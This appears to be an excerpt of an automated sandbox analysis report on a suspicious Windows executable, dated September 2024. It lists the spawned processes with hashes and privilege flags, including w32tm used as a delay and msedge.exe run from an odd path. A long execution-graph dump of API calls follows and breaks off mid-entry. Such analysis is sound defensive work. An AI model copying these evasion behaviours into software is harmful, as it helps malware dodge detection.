                                                                                                                                                                                                    File size:289'792 bytes
                                                                                                                                                                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                    Target ID:57
                                                                                                                                                                                                    Start time:12:26:21
                                                                                                                                                                                                    Start date:30/09/2024
                                                                                                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                    Imagebase:0x7ff6ee680000
                                                                                                                                                                                                    File size:862'208 bytes
                                                                                                                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                    Target ID:58
                                                                                                                                                                                                    Start time:12:26:21
                                                                                                                                                                                                    Start date:30/09/2024
                                                                                                                                                                                                    Path:C:\Windows\System32\chcp.com
                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                    Commandline:chcp 65001
                                                                                                                                                                                                    Imagebase:0x7ff7f1ec0000
                                                                                                                                                                                                    File size:14'848 bytes
                                                                                                                                                                                                    MD5 hash:33395C4732A49065EA72590B14B64F32
                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                    Target ID:59
                                                                                                                                                                                                    Start time:12:26:22
                                                                                                                                                                                                    Start date:30/09/2024
                                                                                                                                                                                                    Path:C:\Edge\msedge.exe
                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                    Commandline:"C:\Edge\msedge.exe"
                                                                                                                                                                                                    Imagebase:0xae0000
                                                                                                                                                                                                    File size:1'963'008 bytes
                                                                                                                                                                                                    MD5 hash:ABD343DF6FBD7334D617F76F6F050E3C
                                                                                                                                                                                                    Has elevated privileges:false
                                                                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                    Target ID:60
                                                                                                                                                                                                    Start time:12:26:23
                                                                                                                                                                                                    Start date:30/09/2024
                                                                                                                                                                                                    Path:C:\Windows\System32\w32tm.exe
                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                    Commandline:w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                                                                                                                                                                                                    Imagebase:0xe00000
                                                                                                                                                                                                    File size:108'032 bytes
                                                                                                                                                                                                    MD5 hash:81A82132737224D324A3E8DA993E2FB5
                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                    Reset < >

                                                                                                                                                                                                      Execution Graph

                                                                                                                                                                                                      Execution Coverage:4.5%
                                                                                                                                                                                                      Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                      Signature Coverage:51.9%
                                                                                                                                                                                                      Total number of Nodes:2000
                                                                                                                                                                                                      Total number of Limit Nodes:6
                                                                                                                                                                                                      execution_graph 19503 7ff68b4cb0d0 19504 7ff68b4cb0e9 19503->19504 19505 7ff68b4cb0f1 __scrt_acquire_startup_lock 19504->19505 19506 7ff68b4cb227 19504->19506 19508 7ff68b4cb231 19505->19508 19515 7ff68b4cb10f __scrt_release_startup_lock 19505->19515 19643 7ff68b4cb548 IsProcessorFeaturePresent 19506->19643 19509 7ff68b4cb548 9 API calls 19508->19509 19510 7ff68b4cb23c 19509->19510 19512 7ff68b4cb244 _exit 19510->19512 19511 7ff68b4cb134 19513 7ff68b4cb1ba _get_initial_narrow_environment __p___argv __p___argc 19523 7ff68b4c3ed0 19513->19523 19515->19511 19515->19513 19517 7ff68b4cb1b2 _register_thread_local_exe_atexit_callback 19515->19517 19517->19513 19520 7ff68b4cb1e7 19521 7ff68b4cb1f1 19520->19521 19522 7ff68b4cb1ec _cexit 19520->19522 19521->19511 19522->19521 19649 7ff68b4b7730 19523->19649 19532 7ff68b4b4220 15 API calls 19536 7ff68b4c3f5f 19532->19536 19533 7ff68b4b4760 35 API calls 19533->19536 19534 7ff68b4b4220 15 API calls 19534->19536 19535 7ff68b4b4bd0 102 API calls 19535->19536 19536->19533 19536->19534 19536->19535 19537 7ff68b4b4220 15 API calls 19536->19537 19538 7ff68b4c3fdc CreateThread 19537->19538 19546 7ff68b4c4031 19538->19546 19539 7ff68b4b1140 __acrt_iob_func __stdio_common_vfprintf 19539->19546 19542 7ff68b4c5c3e _invalid_parameter_noinfo_noreturn 19544 7ff68b4c5c45 19542->19544 19545 7ff68b4cad80 free 19544->19545 19547 7ff68b4c5c4d 19545->19547 19546->19539 19546->19542 19548 7ff68b4c87a0 7 API calls 19546->19548 19549 7ff68b4cad80 free 19546->19549 19560 7ff68b4be8c0 9 API calls 19546->19560 19561 7ff68b4c4b5a ??5?$basic_istream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@AEAH 19546->19561 19562 7ff68b4c87a0 7 API calls 19546->19562 19566 7ff68b4c64f2 19546->19566 19569 7ff68b4b4760 35 API calls 19546->19569 19580 7ff68b4b4bd0 102 API calls 19546->19580 19586 7ff68b4b4220 15 API calls 19546->19586 19596 7ff68b4c53dc system CreateFileW 19546->19596 20304 7ff68b4c87a0 19546->20304 20326 7ff68b4cad80 19546->20326 19547->19547 19550 7ff68b4c6000 MessageBoxA system CreateToolhelp32Snapshot Process32First 19547->19550 19551 7ff68b4c472f ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z 19548->19551 19549->19546 19552 7ff68b4c6090 CloseHandle 19550->19552 19553 7ff68b4c6054 19550->19553 19554 7ff68b4c8550 6 API calls 19551->19554 19556 7ff68b4c609c DeviceIoControl 19552->19556 19555 7ff68b4c6060 lstrcmpiA 19553->19555 19554->19546 19557 7ff68b4c6130 CloseHandle 19555->19557 19558 7ff68b4c607f Process32Next 19555->19558 19559 7ff68b4c610d MessageBoxA exit 19556->19559 19579 7ff68b4c6141 19556->19579 19557->19556 19558->19552 19558->19555 19559->19557 19560->19546 19561->19546 19577 7ff68b4c4b7d 19561->19577 19567 7ff68b4c4aff ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z 19562->19567 19565 7ff68b4b4760 35 API calls 19565->19577 20435 7ff68b4ca930 19566->20435 19571 7ff68b4c8550 6 API calls 19567->19571 19569->19546 19571->19546 19572 7ff68b4c6587 ?_Throw_Cpp_error@std@@YAXH 19573 7ff68b4b4220 15 API calls 19573->19577 19575 7ff68b4c657b ?_Throw_Cpp_error@std@@YAXH 19575->19572 19576 7ff68b4c61cb _Thrd_detach 19576->19575 19576->19579 19577->19565 19577->19573 19578 7ff68b4b4bd0 102 API calls 19577->19578 19582 7ff68b4b4220 15 API calls 19577->19582 19578->19577 19579->19575 19579->19576 19581 7ff68b4c6231 19579->19581 19583 7ff68b4c8050 9 API calls 19579->19583 20362 7ff68b4caf74 19579->20362 19580->19546 19584 7ff68b4caf74 std::_Facet_Register 4 API calls 19581->19584 19585 7ff68b4c4b91 system CreateFileW 19582->19585 19583->19579 19587 7ff68b4c623b _beginthreadex 19584->19587 19620 7ff68b4c4bdb 19585->19620 19586->19546 19589 7ff68b4c6568 ?_Throw_Cpp_error@std@@YAXH 19587->19589 19590 7ff68b4c6277 19587->19590 19588 7ff68b4c50f2 system 20350 7ff68b4c89a0 19588->20350 19589->19575 19592 7ff68b4c6284 _Thrd_detach 19590->19592 19593 7ff68b4c655c ?_Throw_Cpp_error@std@@YAXH 19590->19593 19592->19593 19594 7ff68b4c62a8 19592->19594 19593->19589 19597 7ff68b4c89a0 7 API calls 19594->19597 19605 7ff68b4c541f 19596->19605 19600 7ff68b4c62c6 ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@_K ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z 19597->19600 19598 7ff68b4c51f2 system 19598->19536 19599 7ff68b4c5136 19599->19598 19601 7ff68b4c513e system 19599->19601 19604 7ff68b4c89a0 7 API calls 19600->19604 19601->19536 19603 7ff68b4c89a0 7 API calls 19603->19605 19606 7ff68b4c62f9 ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@_K ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z 19604->19606 19605->19536 19605->19603 19609 7ff68b4c543d 19605->19609 19608 7ff68b4c89a0 7 API calls 19606->19608 19611 7ff68b4c632c 15 API calls 19608->19611 19610 7ff68b4b1140 2 API calls 19609->19610 19612 7ff68b4c56dc 19610->19612 20372 7ff68b4baba0 Direct3DCreate9Ex 19611->20372 19614 7ff68b4be8c0 9 API calls 19612->19614 19619 7ff68b4c5701 19614->19619 19615 7ff68b4c5022 system 19615->19536 19617 7ff68b4c87a0 7 API calls 19623 7ff68b4c4eef ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z 19617->19623 19618 7ff68b4cad80 free 19618->19620 19624 7ff68b4c5773 19619->19624 19627 7ff68b4c87a0 7 API calls 19619->19627 19620->19542 19620->19588 19620->19615 19620->19617 19620->19618 19621 7ff68b4c4f6b system 19620->19621 20329 7ff68b4b1140 __acrt_iob_func 19620->20329 20332 7ff68b4be8c0 19620->20332 19621->19536 19625 7ff68b4c8550 6 API calls 19623->19625 19624->19542 19626 7ff68b4c57aa system 19624->19626 19630 7ff68b4cad80 free 19624->19630 19625->19620 19632 7ff68b4c58a6 19626->19632 19629 7ff68b4c574f ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z 19627->19629 19631 7ff68b4c8550 6 API calls 19629->19631 19630->19626 19631->19619 19633 7ff68b4b1140 2 API calls 19632->19633 19634 7ff68b4c5b7c 19633->19634 19635 7ff68b4be8c0 9 API calls 19634->19635 19636 7ff68b4c5ba1 19635->19636 19637 7ff68b4c5c13 19636->19637 19638 7ff68b4c87a0 7 API calls 19636->19638 19637->19542 19637->19544 19637->19547 19639 7ff68b4c5bef ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z 19638->19639 19640 7ff68b4c8550 6 API calls 19639->19640 19640->19636 19641 7ff68b4cb69c GetModuleHandleW 19642 7ff68b4cb1e3 19641->19642 19642->19510 19642->19520 19644 7ff68b4cb56e 19643->19644 19645 7ff68b4cb57c memset RtlCaptureContext RtlLookupFunctionEntry 19644->19645 19646 7ff68b4cb5f2 memset IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 19645->19646 19647 7ff68b4cb5b6 RtlVirtualUnwind 19645->19647 19648 7ff68b4cb672 19646->19648 19647->19646 19648->19508 19650 7ff68b4be8c0 9 API calls 19649->19650 19651 7ff68b4b7780 19650->19651 19652 7ff68b4be8c0 9 API calls 19651->19652 19653 7ff68b4b77af 19652->19653 19654 7ff68b4be8c0 9 API calls 19653->19654 19655 7ff68b4b77de 19654->19655 19656 7ff68b4be8c0 9 API calls 19655->19656 19657 7ff68b4b780d 19656->19657 19658 7ff68b4be8c0 9 API calls 19657->19658 19659 7ff68b4b783c 19658->19659 19660 7ff68b4be8c0 9 API calls 19659->19660 19661 7ff68b4b786b 19660->19661 19662 7ff68b4be8c0 9 API calls 19661->19662 19663 7ff68b4b789a 19662->19663 19664 7ff68b4be8c0 9 API calls 19663->19664 19665 7ff68b4b78c9 19664->19665 19666 7ff68b4be8c0 9 API calls 19665->19666 19667 7ff68b4b78f8 19666->19667 19668 7ff68b4be8c0 9 API calls 19667->19668 19669 7ff68b4b7927 19668->19669 19670 7ff68b4be8c0 9 API calls 19669->19670 19671 7ff68b4b7956 19670->19671 19672 7ff68b4be8c0 9 API calls 19671->19672 19673 7ff68b4b7985 19672->19673 19674 7ff68b4be8c0 9 API calls 19673->19674 19675 7ff68b4b79b4 19674->19675 19676 7ff68b4be8c0 9 API calls 19675->19676 19677 7ff68b4b79e3 19676->19677 19678 7ff68b4be8c0 9 API calls 19677->19678 19679 7ff68b4b7a12 19678->19679 19680 7ff68b4be8c0 9 API calls 19679->19680 19681 7ff68b4b7a41 19680->19681 19682 7ff68b4be8c0 9 API calls 19681->19682 19683 7ff68b4b7a70 19682->19683 19684 7ff68b4be8c0 9 API calls 19683->19684 19685 7ff68b4b7a9f 19684->19685 19686 7ff68b4be8c0 9 API calls 19685->19686 19687 7ff68b4b7ace 19686->19687 19688 7ff68b4be8c0 9 API calls 19687->19688 19689 7ff68b4b7afd 19688->19689 19690 7ff68b4be8c0 9 API calls 19689->19690 19691 7ff68b4b7b2c 19690->19691 19692 7ff68b4be8c0 9 API calls 19691->19692 19693 7ff68b4b7b5b 19692->19693 19694 7ff68b4be8c0 9 API calls 19693->19694 19695 7ff68b4b7b8a 19694->19695 19696 7ff68b4be8c0 9 API calls 19695->19696 19697 7ff68b4b7bb9 19696->19697 19698 7ff68b4be8c0 9 API calls 19697->19698 19699 7ff68b4b7be8 19698->19699 19700 7ff68b4be8c0 9 API calls 19699->19700 19701 7ff68b4b7c17 19700->19701 19702 7ff68b4be8c0 9 API calls 19701->19702 19703 7ff68b4b7c46 19702->19703 19704 7ff68b4be8c0 9 API calls 19703->19704 19705 7ff68b4b7c75 19704->19705 19706 7ff68b4be8c0 9 API calls 19705->19706 19707 7ff68b4b7ca4 19706->19707 19708 7ff68b4be8c0 9 API calls 19707->19708 19709 7ff68b4b7cd3 19708->19709 19710 7ff68b4be8c0 9 API calls 19709->19710 19711 7ff68b4b7d02 19710->19711 19712 7ff68b4be8c0 9 API calls 19711->19712 19713 7ff68b4b7d31 19712->19713 19714 7ff68b4be8c0 9 API calls 19713->19714 19715 7ff68b4b7d60 19714->19715 19716 7ff68b4be8c0 9 API calls 19715->19716 19717 7ff68b4b7d8f 19716->19717 19718 7ff68b4be8c0 9 API calls 19717->19718 19719 7ff68b4b7dbe 19718->19719 19720 7ff68b4be8c0 9 API calls 19719->19720 19721 7ff68b4b7ded 19720->19721 19722 7ff68b4be8c0 9 API calls 19721->19722 19723 7ff68b4b7e1c 19722->19723 19724 7ff68b4be8c0 9 API calls 19723->19724 19725 7ff68b4b7e4b 19724->19725 19726 7ff68b4be8c0 9 API calls 19725->19726 19727 7ff68b4b7e7a 19726->19727 19728 7ff68b4be8c0 9 API calls 19727->19728 19729 7ff68b4b7ea9 19728->19729 19730 7ff68b4be8c0 9 API calls 19729->19730 19731 7ff68b4b7ed8 19730->19731 19732 7ff68b4be8c0 9 API calls 19731->19732 19733 7ff68b4b7f07 19732->19733 19734 7ff68b4be8c0 9 API calls 19733->19734 19735 7ff68b4b7f36 19734->19735 19736 7ff68b4be8c0 9 API calls 19735->19736 19737 7ff68b4b7f65 19736->19737 19738 7ff68b4be8c0 9 API calls 19737->19738 19739 7ff68b4b7f94 19738->19739 19740 7ff68b4be8c0 9 API calls 19739->19740 19741 7ff68b4b7fc3 19740->19741 19742 7ff68b4be8c0 9 API calls 19741->19742 19743 7ff68b4b7ff2 19742->19743 19744 7ff68b4be8c0 9 API calls 19743->19744 19745 7ff68b4b8021 19744->19745 19746 7ff68b4be8c0 9 API calls 19745->19746 19747 7ff68b4b8050 19746->19747 19748 7ff68b4be8c0 9 API calls 19747->19748 19749 7ff68b4b807f 19748->19749 19750 7ff68b4be8c0 9 API calls 19749->19750 19751 7ff68b4b80ae 19750->19751 19752 7ff68b4be8c0 9 API calls 19751->19752 19753 7ff68b4b80dd 19752->19753 19754 7ff68b4be8c0 9 API calls 19753->19754 19755 7ff68b4b810c 19754->19755 19756 7ff68b4be8c0 9 API calls 19755->19756 19757 7ff68b4b813b 19756->19757 19758 7ff68b4be8c0 9 API calls 19757->19758 19759 7ff68b4b816a 19758->19759 19760 7ff68b4be8c0 9 API calls 19759->19760 19761 7ff68b4b8199 19760->19761 19762 7ff68b4be8c0 9 API calls 19761->19762 19763 7ff68b4b81c8 19762->19763 19764 7ff68b4be8c0 9 API calls 19763->19764 19765 7ff68b4b81f7 19764->19765 19766 7ff68b4be8c0 9 API calls 19765->19766 19767 7ff68b4b8226 19766->19767 19768 7ff68b4be8c0 9 API calls 19767->19768 19769 7ff68b4b8255 19768->19769 19770 7ff68b4be8c0 9 API calls 19769->19770 19771 7ff68b4b8284 19770->19771 19772 7ff68b4be8c0 9 API calls 19771->19772 19773 7ff68b4b82b3 19772->19773 19774 7ff68b4be8c0 9 API calls 19773->19774 19775 7ff68b4b82e2 19774->19775 19776 7ff68b4be8c0 9 API calls 19775->19776 19777 7ff68b4b8311 19776->19777 19778 7ff68b4be8c0 9 API calls 19777->19778 19779 7ff68b4b8340 19778->19779 19780 7ff68b4be8c0 9 API calls 19779->19780 19781 7ff68b4b836f 19780->19781 19782 7ff68b4be8c0 9 API calls 19781->19782 19783 7ff68b4b839e 19782->19783 19784 7ff68b4be8c0 9 API calls 19783->19784 19785 7ff68b4b83cd 19784->19785 19786 7ff68b4be8c0 9 API calls 19785->19786 19787 7ff68b4b83fc 19786->19787 19788 7ff68b4be8c0 9 API calls 19787->19788 19789 7ff68b4b842b 19788->19789 19790 7ff68b4be8c0 9 API calls 19789->19790 19791 7ff68b4b845a 19790->19791 19792 7ff68b4be8c0 9 API calls 19791->19792 19793 7ff68b4b8489 19792->19793 19794 7ff68b4be8c0 9 API calls 19793->19794 19795 7ff68b4b84b8 19794->19795 19796 7ff68b4be8c0 9 API calls 19795->19796 19797 7ff68b4b84e7 19796->19797 19798 7ff68b4be8c0 9 API calls 19797->19798 19799 7ff68b4b8516 19798->19799 19800 7ff68b4be8c0 9 API calls 19799->19800 19801 7ff68b4b8545 19800->19801 19802 7ff68b4be8c0 9 API calls 19801->19802 19803 7ff68b4b8574 19802->19803 19804 7ff68b4be8c0 9 API calls 19803->19804 19805 7ff68b4b85a3 19804->19805 19806 7ff68b4be8c0 9 API calls 19805->19806 19807 7ff68b4b85d2 19806->19807 19808 7ff68b4be8c0 9 API calls 19807->19808 19809 7ff68b4b8601 19808->19809 19810 7ff68b4be8c0 9 API calls 19809->19810 19811 7ff68b4b8630 19810->19811 19812 7ff68b4be8c0 9 API calls 19811->19812 19813 7ff68b4b865f 19812->19813 19814 7ff68b4be8c0 9 API calls 19813->19814 19815 7ff68b4b868e 19814->19815 19816 7ff68b4be8c0 9 API calls 19815->19816 19817 7ff68b4b86bd 19816->19817 19818 7ff68b4be8c0 9 API calls 19817->19818 19819 7ff68b4b86ec 19818->19819 19820 7ff68b4be8c0 9 API calls 19819->19820 19821 7ff68b4b871b 19820->19821 19822 7ff68b4be8c0 9 API calls 19821->19822 19823 7ff68b4b874a 19822->19823 19824 7ff68b4be8c0 9 API calls 19823->19824 19825 7ff68b4b8779 19824->19825 19826 7ff68b4be8c0 9 API calls 19825->19826 19827 7ff68b4b87a8 19826->19827 19828 7ff68b4be8c0 9 API calls 19827->19828 19829 7ff68b4b87d7 19828->19829 19830 7ff68b4be8c0 9 API calls 19829->19830 19831 7ff68b4b8806 19830->19831 19832 7ff68b4be8c0 9 API calls 19831->19832 19833 7ff68b4b8835 19832->19833 19834 7ff68b4be8c0 9 API calls 19833->19834 19835 7ff68b4b8864 19834->19835 19836 7ff68b4be8c0 9 API calls 19835->19836 19837 7ff68b4b8893 19836->19837 19838 7ff68b4be8c0 9 API calls 19837->19838 19839 7ff68b4b88c2 19838->19839 19840 7ff68b4be8c0 9 API calls 19839->19840 19841 7ff68b4b88f1 19840->19841 19842 7ff68b4be8c0 9 API calls 19841->19842 19843 7ff68b4b8920 19842->19843 19844 7ff68b4be8c0 9 API calls 19843->19844 19845 7ff68b4b894f 19844->19845 19846 7ff68b4be8c0 9 API calls 19845->19846 19847 7ff68b4b897e 19846->19847 19848 7ff68b4be8c0 9 API calls 19847->19848 19849 7ff68b4b89ad 19848->19849 19850 7ff68b4be8c0 9 API calls 19849->19850 19851 7ff68b4b89dc 19850->19851 19852 7ff68b4be8c0 9 API calls 19851->19852 19853 7ff68b4b8a0b 19852->19853 19854 7ff68b4be8c0 9 API calls 19853->19854 19855 7ff68b4b8a3a 19854->19855 19856 7ff68b4be8c0 9 API calls 19855->19856 19857 7ff68b4b8a69 19856->19857 19858 7ff68b4be8c0 9 API calls 19857->19858 19859 7ff68b4b8a98 19858->19859 19860 7ff68b4be8c0 9 API calls 19859->19860 19861 7ff68b4b8ac7 19860->19861 19862 7ff68b4be8c0 9 API calls 19861->19862 19863 7ff68b4b8af6 19862->19863 19864 7ff68b4be8c0 9 API calls 19863->19864 19865 7ff68b4b8b25 19864->19865 19866 7ff68b4be8c0 9 API calls 19865->19866 19867 7ff68b4b8b4b 19866->19867 19868 7ff68b4be8c0 9 API calls 19867->19868 19869 7ff68b4b8b71 19868->19869 19870 7ff68b4be8c0 9 API calls 19869->19870 19871 7ff68b4b8b97 19870->19871 19872 7ff68b4be8c0 9 API calls 19871->19872 19873 7ff68b4b8bbd 19872->19873 19874 7ff68b4be8c0 9 API calls 19873->19874 19875 7ff68b4b8be3 19874->19875 19876 7ff68b4be8c0 9 API calls 19875->19876 19877 7ff68b4b8c09 19876->19877 19878 7ff68b4be8c0 9 API calls 19877->19878 19879 7ff68b4b8c2f 19878->19879 19880 7ff68b4be8c0 9 API calls 19879->19880 19881 7ff68b4b8c55 19880->19881 19882 7ff68b4be8c0 9 API calls 19881->19882 19883 7ff68b4b8c7e 19882->19883 19884 7ff68b4be8c0 9 API calls 19883->19884 19885 7ff68b4b8ca7 19884->19885 19886 7ff68b4be8c0 9 API calls 19885->19886 19887 7ff68b4b8cd0 19886->19887 19888 7ff68b4b8d10 19887->19888 19889 7ff68b4b8d0b 19887->19889 19892 7ff68b4b8d04 _invalid_parameter_noinfo_noreturn 19887->19892 19890 7ff68b4b8d51 19888->19890 19894 7ff68b4b8d4c 19888->19894 19898 7ff68b4b8d45 _invalid_parameter_noinfo_noreturn 19888->19898 19893 7ff68b4cad80 free 19889->19893 19891 7ff68b4b8d92 19890->19891 19896 7ff68b4b8d8d 19890->19896 19900 7ff68b4b8d86 _invalid_parameter_noinfo_noreturn 19890->19900 19897 7ff68b4b8dd1 19891->19897 19902 7ff68b4b8dcc 19891->19902 19905 7ff68b4b8dc5 _invalid_parameter_noinfo_noreturn 19891->19905 19892->19889 19893->19888 19895 7ff68b4cad80 free 19894->19895 19895->19890 19901 7ff68b4cad80 free 19896->19901 19899 7ff68b4b8e10 19897->19899 19903 7ff68b4b8e0b 19897->19903 19908 7ff68b4b8e04 _invalid_parameter_noinfo_noreturn 19897->19908 19898->19894 19904 7ff68b4b8e4f 19899->19904 19910 7ff68b4b8e4a 19899->19910 19913 7ff68b4b8e43 _invalid_parameter_noinfo_noreturn 19899->19913 19900->19896 19901->19891 19906 7ff68b4cad80 free 19902->19906 19909 7ff68b4cad80 free 19903->19909 19907 7ff68b4b8e8e 19904->19907 19911 7ff68b4b8e89 19904->19911 19915 7ff68b4b8e82 _invalid_parameter_noinfo_noreturn 19904->19915 19905->19902 19906->19897 19912 7ff68b4b8ecd 19907->19912 19917 7ff68b4b8ec8 19907->19917 19919 7ff68b4b8ec1 _invalid_parameter_noinfo_noreturn 19907->19919 19908->19903 19909->19899 19914 7ff68b4cad80 free 19910->19914 19916 7ff68b4cad80 free 19911->19916 19918 7ff68b4b8f0c 19912->19918 19921 7ff68b4b8f07 19912->19921 19922 7ff68b4b8f00 _invalid_parameter_noinfo_noreturn 19912->19922 19913->19910 19914->19904 19915->19911 19916->19907 19920 7ff68b4cad80 free 19917->19920 19924 7ff68b4b8f46 19918->19924 19925 7ff68b4b8f3f _invalid_parameter_noinfo_noreturn 19918->19925 19928 7ff68b4b8f4b 19918->19928 19919->19917 19920->19912 19923 7ff68b4cad80 free 19921->19923 19922->19921 19923->19918 19926 7ff68b4cad80 free 19924->19926 19925->19924 19926->19928 19927 7ff68b4b8f85 19929 7ff68b4cad80 free 19927->19929 19928->19927 19933 7ff68b4b8f7e _invalid_parameter_noinfo_noreturn 19928->19933 19934 7ff68b4b8f8a 19928->19934 19929->19934 19930 7ff68b4b8fca 19937 7ff68b4cad80 free 19930->19937 19931 7ff68b4b9014 19935 7ff68b4b9059 19931->19935 19939 7ff68b4b9054 19931->19939 19943 7ff68b4b904d _invalid_parameter_noinfo_noreturn 19931->19943 19932 7ff68b4b8fcf 19932->19931 19938 7ff68b4b900f 19932->19938 19941 7ff68b4b9008 _invalid_parameter_noinfo_noreturn 19932->19941 19933->19927 19934->19930 19934->19932 19936 7ff68b4b8fc3 _invalid_parameter_noinfo_noreturn 19934->19936 19940 7ff68b4b909e 19935->19940 19945 7ff68b4b9099 19935->19945 19949 7ff68b4b9092 _invalid_parameter_noinfo_noreturn 19935->19949 19936->19930 19937->19932 19942 7ff68b4cad80 free 19938->19942 19944 7ff68b4cad80 free 19939->19944 19946 7ff68b4b90e3 19940->19946 19947 7ff68b4b90de 19940->19947 19951 7ff68b4b90d7 _invalid_parameter_noinfo_noreturn 19940->19951 19941->19938 19942->19931 19943->19939 19944->19935 19950 7ff68b4cad80 free 19945->19950 19948 7ff68b4b9128 19946->19948 19953 7ff68b4b9123 19946->19953 19956 7ff68b4b911c _invalid_parameter_noinfo_noreturn 19946->19956 19952 7ff68b4cad80 free 19947->19952 19954 7ff68b4b916d 19948->19954 19958 7ff68b4b9168 19948->19958 19962 7ff68b4b9161 _invalid_parameter_noinfo_noreturn 19948->19962 19949->19945 19950->19940 19951->19947 19952->19946 19957 7ff68b4cad80 free 19953->19957 19955 7ff68b4b91b2 19954->19955 19960 7ff68b4b91ad 19954->19960 19964 7ff68b4b91a6 _invalid_parameter_noinfo_noreturn 19954->19964 19961 7ff68b4b91f7 19955->19961 19966 7ff68b4b91f2 19955->19966 19969 7ff68b4b91eb _invalid_parameter_noinfo_noreturn 19955->19969 19956->19953 19957->19948 19959 7ff68b4cad80 free 19958->19959 19959->19954 19965 7ff68b4cad80 free 19960->19965 19963 7ff68b4b923c 19961->19963 19967 7ff68b4b9237 19961->19967 19972 7ff68b4b9230 _invalid_parameter_noinfo_noreturn 19961->19972 19962->19958 19968 7ff68b4b9281 19963->19968 19974 7ff68b4b927c 19963->19974 19977 7ff68b4b9275 _invalid_parameter_noinfo_noreturn 19963->19977 19964->19960 19965->19955 19970 7ff68b4cad80 free 19966->19970 19973 7ff68b4cad80 free 19967->19973 19971 7ff68b4b92c6 19968->19971 19975 7ff68b4b92c1 19968->19975 19979 7ff68b4b92ba _invalid_parameter_noinfo_noreturn 19968->19979 19969->19966 19970->19961 19976 7ff68b4b930b 19971->19976 19981 7ff68b4b9306 19971->19981 19984 7ff68b4b92ff _invalid_parameter_noinfo_noreturn 19971->19984 19972->19967 19973->19963 19978 7ff68b4cad80 free 19974->19978 19980 7ff68b4cad80 free 19975->19980 19982 7ff68b4b9350 19976->19982 19986 7ff68b4b934b 19976->19986 19987 7ff68b4b9344 _invalid_parameter_noinfo_noreturn 19976->19987 19977->19974 19978->19968 19979->19975 19980->19971 19985 7ff68b4cad80 free 19981->19985 19983 7ff68b4b9395 19982->19983 19989 7ff68b4b9390 19982->19989 19992 7ff68b4b9389 _invalid_parameter_noinfo_noreturn 19982->19992 19990 7ff68b4b93da 19983->19990 19994 7ff68b4b93d5 19983->19994 19998 7ff68b4b93ce _invalid_parameter_noinfo_noreturn 19983->19998 19984->19981 19985->19976 19988 7ff68b4cad80 free 19986->19988 19987->19986 19988->19982 19993 7ff68b4cad80 free 19989->19993 19991 7ff68b4b941f 19990->19991 19996 7ff68b4b941a 19990->19996 20000 7ff68b4b9413 _invalid_parameter_noinfo_noreturn 19990->20000 19997 7ff68b4b9464 19991->19997 20002 7ff68b4b945f 19991->20002 20005 7ff68b4b9458 _invalid_parameter_noinfo_noreturn 19991->20005 19992->19989 19993->19983 19995 7ff68b4cad80 free 19994->19995 19995->19990 20001 7ff68b4cad80 free 19996->20001 19999 7ff68b4b94a9 19997->19999 20003 7ff68b4b94a4 19997->20003 20007 7ff68b4b949d _invalid_parameter_noinfo_noreturn 19997->20007 19998->19994 20004 7ff68b4b94ee 19999->20004 20009 7ff68b4b94e9 19999->20009 20013 7ff68b4b94e2 _invalid_parameter_noinfo_noreturn 19999->20013 20000->19996 20001->19991 20006 7ff68b4cad80 free 20002->20006 20008 7ff68b4cad80 free 20003->20008 20010 7ff68b4b9533 20004->20010 20011 7ff68b4b952e 20004->20011 20015 7ff68b4b9527 _invalid_parameter_noinfo_noreturn 20004->20015 20005->20002 20006->19997 20007->20003 20008->19999 20014 7ff68b4cad80 free 20009->20014 20012 7ff68b4b9578 20010->20012 20017 7ff68b4b9573 20010->20017 20020 7ff68b4b956c _invalid_parameter_noinfo_noreturn 20010->20020 20016 7ff68b4cad80 free 20011->20016 20018 7ff68b4b95bd 20012->20018 20022 7ff68b4b95b8 20012->20022 20026 7ff68b4b95b1 _invalid_parameter_noinfo_noreturn 20012->20026 20013->20009 20014->20004 20015->20011 20016->20010 20021 7ff68b4cad80 free 20017->20021 20019 7ff68b4b9602 20018->20019 20024 7ff68b4b95fd 20018->20024 20028 7ff68b4b95f6 _invalid_parameter_noinfo_noreturn 20018->20028 20025 